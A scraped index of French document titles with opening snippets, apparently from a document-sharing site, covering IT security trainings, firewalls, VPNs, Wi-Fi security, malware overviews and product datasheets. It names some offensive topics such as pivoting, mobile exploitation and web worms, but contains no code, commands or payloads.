Instructions Mozilla Thunderbird Page 1 Instructions Mozilla Thunderbird Ce manuel est écrit pour les utilisateurs qui font déjà configurer un compte de courrier électronique dans Mozilla Thunderbird et
WINDOWS Remote Desktop & Application publishing facile!
Secure Cloud & Solutions Accès BOYD CLOUD acces informatiques & BYOD sécurisé MYRIAD-Connect facilite votre travail en tous lieux et à tous moments comme si vous étiez au bureau. Conçu pour vous simplifier
BIG DATA APPLIQUÉES À LA SÉCURITÉ. Emmanuel MACÉ Akamai Technologies
BIG DATA APPLIQUÉES À LA SÉCURITÉ Emmanuel MACÉ Akamai Technologies DÉFINITIONS Grow revenue opportunities with fast, personalized web experiences and manage complexity from peak demand, mobile devices
LINUX - Sécurité. Déroulé de l'action. - 3 jours - Contenu de formation
Objectif : Tout administrateur système et réseau souhaitant avoir une vision d'ensemble des problèmes de sécurité informatique et des solutions existantes dans l'environnement Linux. Prérequis : Connaissance
Tunnels et VPN. 22/01/2009 Formation Permanente Paris6 86
Tunnels et VPN 22/01/2009 Formation Permanente Paris6 86 Sécurisation des communications Remplacement ou sécurisation de tous les protocoles ne chiffrant pas l authentification + éventuellement chiffrement
WORKSHOP OBIEE 11g (version 11.1.1.5) PRE-REQUIS:
WORKSHOP OBIEE 11g (version 11.1.1.5) Durée du workshop: 2 jours Profil des participants du workshop: Profil fonctionnel ou technique Notions de modélisation multidimensionnelle et du décisionnel NB :
CHEF ATELIER CHEF ATELIER
Mobile Exploitation CHEF ATELIER : MERIEM MEMMICHE (RT3) SARAH LOUSSAIEF(RT3) OUSSEMA BEN GHROBEL EMNA MANNAI (RT3) ALY MESSAOUDI (RT3) TARAK CHAABOUNI (RT3) Table des matières 1. Présentation de l atelier......
Atelier Pivoting KHOULOUD GATTOUSSI (RT3) ASMA LAHBIB (RT3) KHAOULA BLEL (RT3) KARIMA MAALAOUI (RT3)
Atelier Pivoting KHOULOUD GATTOUSSI (RT3) ASMA LAHBIB (RT3) KHAOULA BLEL (RT3) KARIMA MAALAOUI (RT3) Table des matières 1. Présentation de l atelier... 2 2. Présentation des outils utilisés... 2 a. GNS3
Ce document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des tablettes ou smartphones.
PERSPECTIVES Le Single Sign-On mobile vers Microsoft Exchange avec OWA et ActiveSync Ce document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des
Retour d expérience sur Prelude
Retour d expérience sur Prelude OSSIR Paris / Mathieu Mauger Consultant Sécurité ([email protected]) Guillaume Lopes Consultant Sécurité ([email protected]) @Intrinsec_Secu 1 Plan
Catalogue des formations
Catalogue des formations NANCY et TRAINING (siège) 22 rue de Médreville 54000 Nancy Téléphone : 03 83 67 63 05 METZ 4 rue Marconi 57070 Metz Téléphone : 03 87 20 35 02 REIMS 09 rue Pingat 51000 Reims Téléphone
Audits de sécurité, supervision en continu Renaud Deraison
Audits de sécurité, supervision en continu Renaud Deraison Bio (en deux phrases) Auteur du logiciel Nessus (1998 -) Co-fondateur de Tenable Network Security, Inc. (Maryland, 2002 -) Tenable La société
La Sécurité des Données en Environnement DataCenter
La Sécurité des Données en Environnement DataCenter Thien-Trung Nguyen [email protected] 1 Agenda Présentation Imperva Protection des applications Web Protection des données sensibles Modes de déploiement
Package Contents. System Requirements. Before You Begin
Package Contents DWA-125 Wireless 150 USB Adapter CD-ROM (contains software, drivers, and manual) Cradle If any of the above items are missing, please contact your reseller. System Requirements A computer
Table des matières. 1. Installation de VMware ESXI 4... 3. 1.1. Pré-requis... 3. 1.2. Installation... 3
Table des matières 1. Installation de VMware ESXI 4.... 3 1.1. Pré-requis... 3 1.2. Installation... 3 1.2.1. Panneau de configuration du serveur ESXI... 4 1.2.2. Configuration du mot de passe «Root»....
PACK SKeeper Multi = 1 SKeeper et des SKubes
PACK SKeeper Multi = 1 SKeeper et des SKubes De plus en plus, les entreprises ont besoin de communiquer en toute sécurité avec leurs itinérants, leurs agences et leurs clients via Internet. Grâce au Pack
Indicateur et tableau de bord
Agenda Indicateur et tableau de bord «La sécurité n est pas une destination mais un voyage» 1. Jean-François DECHANT & Philippe CONCHONNET [email protected] & [email protected] +33 (0) 4 72
DenyAll Detect. Documentation technique 27/07/2015
DenyAll Detect Documentation technique 27/07/2015 Sommaire 1. A propos de ce document... 3 1.1 Objet... 3 1.2 Historique... 3 1.3 Contexte... 3 2. Liste des tests... 4 2.1 Découverte réseau (scan de ports)...
Atelier Sécurité / OSSIR
Atelier Sécurité / OSSIR Présentation Produits eeye SecureIIS Retina [email protected] & [email protected] Sommaire Page 2 Qui sommes nous? SecureIIS Protection Web Retina Scanner de Sécurité Questions
Comment Accéder à des Bases de Données MySQL avec Windows lorqu'elles sont sur un Serveur Linux
Comment Accéder à des Bases de Données MySQL avec Windows lorqu'elles sont sur un Serveur Linux Distribué par Le Projet Documentation d'openoffice.org Table of Contents 1) Préambule...3 2) Télécharger
Sécurité des réseaux Les attaques
Sécurité des réseaux Les attaques A. Guermouche A. Guermouche Cours 2 : Les attaques 1 Plan 1. Les attaques? 2. Quelques cas concrets DNS : Failles & dangers 3. honeypot A. Guermouche Cours 2 : Les attaques
Polux Développement d'une maquette pour implémenter des tests de sécurité
Polux Développement d'une maquette pour implémenter des tests de sécurité équipes SERES et SSIR 28 septembre 2007 2 / 55 Plan Première partie I Aspects fonctionnels 3 / 55 Plan 1 Présentation des aspects
Etude de la pertinence et de l'intérêt des appliances WAF (IPS web) à l'inria
Etude de la pertinence et de l'intérêt des appliances WAF (IPS web) à l'inria 1 Philippe Lecler TutoJRES «Sécurité des sites WEB» 4 février 2010 Contexte 2 PCI-DSS : Payment Card Industry Data Security
Haka : un langage orienté réseaux et sécurité
Haka : un langage orienté réseaux et sécurité Kevin Denis, Paul Fariello, Pierre Sylvain Desse et Mehdi Talbi [email protected] [email protected] [email protected] [email protected] Arkoon Network
Sécurité des réseaux sans fil
Sécurité des réseaux sans fil Matthieu Herrb CNRS-LAAS [email protected] Septembre 2003 SIARS Toulouse 2003 Plan La technologie sans fils Faiblesses et Attaques Architecture Sécurisation des postes
Petit guide pour l installation de CVW sous Linux
LinuxFocus article number 310 http://linuxfocus.org par Juan Manuel Triana,Carlos Andrés Pérez Petit guide pour l installation de CVW sous Linux L auteur:
Les techniques de la télémaintenance
Les techniques de la télémaintenance 1. VNC Virtual Network Computer est un produit gratuit de prise de contrôle à distance; Sa particularité est de permettre le contrôle de l'interface graphique d'une
Logitech Tablet Keyboard for Windows 8, Windows RT and Android 3.0+ Setup Guide Guide d installation
Logitech Tablet Keyboard for Windows 8, Windows RT and Android 3.0+ Setup Guide Guide d installation English.......................................... 3 Français.........................................
1. Formation F5 - Local Traffic Manager Configuring (LTM)
Description F5 F5 Networks, Inc. (NASDAQ: FFIV) est une entreprise informatique américaine fondée en 1996 établie à Seattle qui commercialise des équipements réseau. Dans les années 1990, la société a
L'écoute des conversations VoIP
L'écoute des conversations VoIP Marc-André Meloche (OSCP, C EH, Security+) et Eric Gingras 5 à 7 Technique 21 Septembre 2010 Gardien Virtuel Entreprise de services-conseils spécialisée dans la sécurité
WiFI Sécurité et nouvelles normes
WiFI Sécurité et nouvelles normes FRNOG 25 septembre 2003 [email protected] Agenda DEVOTEAM Group La soupe à l alphabet et acronymes du 802.11 Normes Les services securité WEP, EAP, TKIP Exploitation
Impression de sécurité?
Impression de sécurité? Matthieu Herrb Capitoul, le 1er avril 2010 Agenda 1 Introduction 2 Risque lié au logiciel d impression 3 Risques liés au réseau 4 Risques liés à l imprimante 5 Risques liés papier
cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007
F i r e w a l l s e t a u t r e s é l é m e n t s d ' a r c h i t e c t u r e d e s é c u r i t é cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL
Réalisation d un portail captif d accès authentifié à Internet 10.10.10.1
Master 1 ère année UE Réseaux avancés I Projet Réalisation d un portail captif d accès authentifié à Internet Présentation du projet Le but du projet est de mettre en place un portail captif permettant
Vulnérabilités et sécurisation des applications Web
OSSIR 09/09/2002 Vulnérabilités, attaques et sécurisation des applications Web Pourquoi les firewalls sont impuissants [email protected] http://www.edelweb.fr http://www.chambet.com Page 1 Planning
Tom Pertsekos. Sécurité applicative Web : gare aux fraudes et aux pirates!
Tom Pertsekos Sécurité applicative Web : gare aux fraudes et aux pirates! Sécurité Le mythe : «Notre site est sûr» Nous avons des Nous auditons nos Firewalls en place applications périodiquement par des
Création d un «Web Worm»
Création d un «Web Worm» Exploitation automatisée des failles web Simon Marechal Thales Security Systems Consultant Risk Management 1 Création d un ver exploitant une faille web 1.1 Introduction Les applications
Systèmes Répartis. Pr. Slimane Bah, ing. PhD. Ecole Mohammadia d Ingénieurs. G. Informatique. Semaine 24.2. [email protected]
Ecole Mohammadia d Ingénieurs Systèmes Répartis Pr. Slimane Bah, ing. PhD G. Informatique Semaine 24.2 1 Semestre 4 : Fev. 2015 Grid : exemple SETI@home 2 Semestre 4 : Fev. 2015 Grid : exemple SETI@home
«Obad.a» : le malware Android le plus perfectionné à ce jour
«Obad.a» : le malware Android le plus perfectionné à ce jour Table des matières I. Le sujet de l article... 2 II. Réflexion sur les nouvelles menaces technologiques d aujourd hui... 2 A. Android, victime
Netdays 2004. Comprendre et prévenir les risques liés aux codes malicieux
1 Netdays 2004 Comprendre et prévenir les risques liés aux codes malicieux 2 Comprendre et prévenir les risques liés aux codes malicieux - Motivations - Les principaux types de codes malicieux - Les principales
CATALOGUE DES FORMATIONS SECURITE INFORMATIQUE
Janvier 2013 Décembre CATALOGUE DES FORMATIONS SECURITE INFORMATIQUE Certifications Sécurité EC-Council Séminaires Renforcement des Capacités Training Day : Initiation à la Sécurité Informatique Tél :
Réseaux. Moyens de sécurisation. Plan. Evolutions topologiques des réseaux locaux
Réseaux Evolutions topologiques des réseaux locaux Plan Infrastructures d entreprises Routeurs et Firewall Topologie et DMZ Proxy VPN PPTP IPSEC VPN SSL Du concentrateur à la commutation Hubs et switchs
Catalogue de formations
Catalogue de Janvier 2012 Catalogue par thématiques Microsoft Office 2010 - http://tinyurl.com/formation-office2010 485 vidéos - 38 heures de formation Word, Excel, PowerPoint, Outlook, Access, Publisher,
GIGABIT PCI DESKTOP ADAPTER DGE-530T. Quick Installation Guide+ Guide d installation+
GIGABIT PCI DESKTOP ADAPTER Quick Installation Guide+ Guide d installation+ Check Your Package Contents Quick Installation Guide Gigabit Ethernet PCI Adapter CD with Manual and Drivers DO NOT insert the
Fiche Technique. Cisco Security Agent
Fiche Technique Cisco Security Agent Avec le logiciel de sécurité de point d extrémité Cisco Security Agent (CSA), Cisco offre à ses clients la gamme de solutions de protection la plus complète qui soit
Devoir Surveillé de Sécurité des Réseaux
Année scolaire 2009-2010 IG2I L5GRM Devoir Surveillé de Sécurité des Réseaux Enseignant : Armand Toguyéni Durée : 2h Documents : Polycopiés de cours autorisés Note : Ce sujet comporte deux parties. La
1. Planification, Implémentation Et Maintenance D une Infrastructure Active Directory Microsoft Windows server 2003
C.V CHARGUI KAIES Adresse : 4 Rue de Gaza Cité Nouvelle Kalaa Sghira Sousse Date de naissance : 07/10/1980 Situation de famille : Marié Téléphone : 98 40 67 08 Email : [email protected] OBJECTIF
SHAREPOINT PORTAL SERVER 2013
Powered by TCPDF (www.tcpdf.org) SHAREPOINT PORTAL SERVER 2013 Sharepoint portal server 2013 DEVELOPING MICROSOFT SHAREPOINT SERVER 2013 CORE SOLUTIONS Réf: MS20488 Durée : 5 jours (7 heures) OBJECTIFS
Technologies du Web. Créer et héberger un site Web. Pierre Senellart. Page 1 / 26 Licence de droits d usage
Technologies du Web Créer et héberger un site Web Page 1 / 26 Plan Planification Choisir une solution d hébergement Administration Développement du site Page 2 / 26 Cahier des charges Objectifs du site
EXALOGIC ELASTIC CLOUD MANAGEMENT
EXALOGIC ELASTIC CLOUD MANAGEMENT Jean-Marc Digne Ingénieur Avant Vente Oracle France 1 The following is intended to outline our general product direction. It is intended for information purposes only,
1/ Introduction. 2/ Schéma du réseau
1/ Introduction FWBuilder est un logiciel-libre multi-plateforme qui permet de créer ses propres pare-feux et les utiliser sur différents SE ou sur du matériel informatique. Objectif : Créer un pare-feu
Authentification sur réseau sans-fil Utilisation d un serveur radius Expérience du CENBG
Authentification sur réseau sans-fil Utilisation d un serveur radius Expérience du CENBG Sommaire Critères de choix d architecture Solution adoptée Serveur radius Configurations Cas des visiteurs portail
StormShield v4.0 StormShield - Version 4.0 Presentation OSSIR 10 juillet 2006
StormShield v4.0 StormShield - Version 4.0 Presentation OSSIR 10 juillet 2006 SkyRecon Systems - éditeur de StormShield Editeur de Logiciels Français De grands groupes parmi les investisseurs: DGA, la
Bee Ware. Cible de Sécurité CSPN. Validation Fonctionnelle Validation Fonctionnelle Bon pour application AMOA BEEWARE BEEWARE
Référence : BNX_Cible-de-sécurité_CSPN Version : 1.3 Etat : A valider Date : Affaire/projet : Client : BEE WARE Classification : Diffusion projet Bee Ware i-suite Cible de Sécurité CSPN Validation Fonctionnelle
Rapport de certification ANSSI-CSPN-2011/14. Fonctionnalités de pare-feu de StoneGate Firewall/VPN 5.2.4 build 8069
PREM IE R M IN IS T R E Secrétariat général de la défense et de la sécurité nationale Agence nationale de la sécurité des systèmes d information Rapport de certification ANSSI-CSPN-2011/14 Fonctionnalités
IV. La sécurité du sans-fil
IV. La sécurité du sans-fil Le Wi-Fi est un vrai défis et une vraie révolution. Le développement de ces outils à été plus vite que l apparition des normes, il en découle de sérieux problèmes de base. Nul
Laboratoire de Haute Sécurité. Télescope réseau et sécurité des réseaux
Laboratoire de Haute Sécurité Télescope réseau et sécurité des réseaux Frédéric Beck (SED) & Olivier Festor (Madynes) CLUSIR Est - 15 Décembre 2011 Inria : Institut de recherche en sciences du numérique
INTERNET est un RESEAU D ORDINATEURS RELIES ENTRE EUX A L ECHELLE PLANETAIRE. Internet : interconnexion de réseaux (anglais : net = réseau)
CS WEB Ch 1 Introduction I. INTRODUCTION... 1 A. INTERNET INTERCONNEXION DE RESEAUX... 1 B. LE «WEB» LA TOILE, INTERCONNEXION DE SITES WEB... 2 C. L URL : LOCALISER DES RESSOURCES SUR L INTERNET... 2 D.
Fonctionnement de Iptables. Exercices sécurité. Exercice 1
Exercice 1 Exercices sécurité 1. Parmi les affirmations suivantes, lesquelles correspondent à des (bonnes) stratégies de défenses? a) Il vaut mieux interdire tout ce qui n'est pas explicitement permis.
Description de l implantation dans le centre d examen (nom du service ou de l outil et caractéristiques techniques)
ANNEXE VII-1 : modèle d attestation de respect du cahier des charges pour l épreuve E4 (parcours SISR) BTS SERVICES INFORMATIQUES AUX ORGANISATIONS Session 2014 CONTRÔLE DE L ENVIRONNEMENT TECHNOLOGIQUE
Instructions pour mettre à jour un HFFv2 v1.x.yy v2.0.00
Instructions pour mettre à jour un HFFv2 v1.x.yy v2.0.00 HFFv2 1. OBJET L accroissement de la taille de code sur la version 2.0.00 a nécessité une évolution du mapping de la flash. La conséquence de ce
«Evolution des menaces de sécurité et lutte contre les cyber attaques» Mathieu Vialetay, CISSP. Security Consultant, North Africa Tlemcen, juin 2013
«Evolution des menaces de sécurité et lutte contre les cyber attaques» Mathieu Vialetay, CISSP Security Consultant, North Africa Tlemcen, juin 2013 Des fondations solides Symantec Global Intelligence Network
Introduction aux antivirus et présentation de ClamAV
Introduction aux antivirus et présentation de ClamAV Un antivirus libre pour un système libre Antoine Cervoise ClamAV : http://www.clamav.net/ Plan Le monde des malwares Historique Les logiciels malveillants
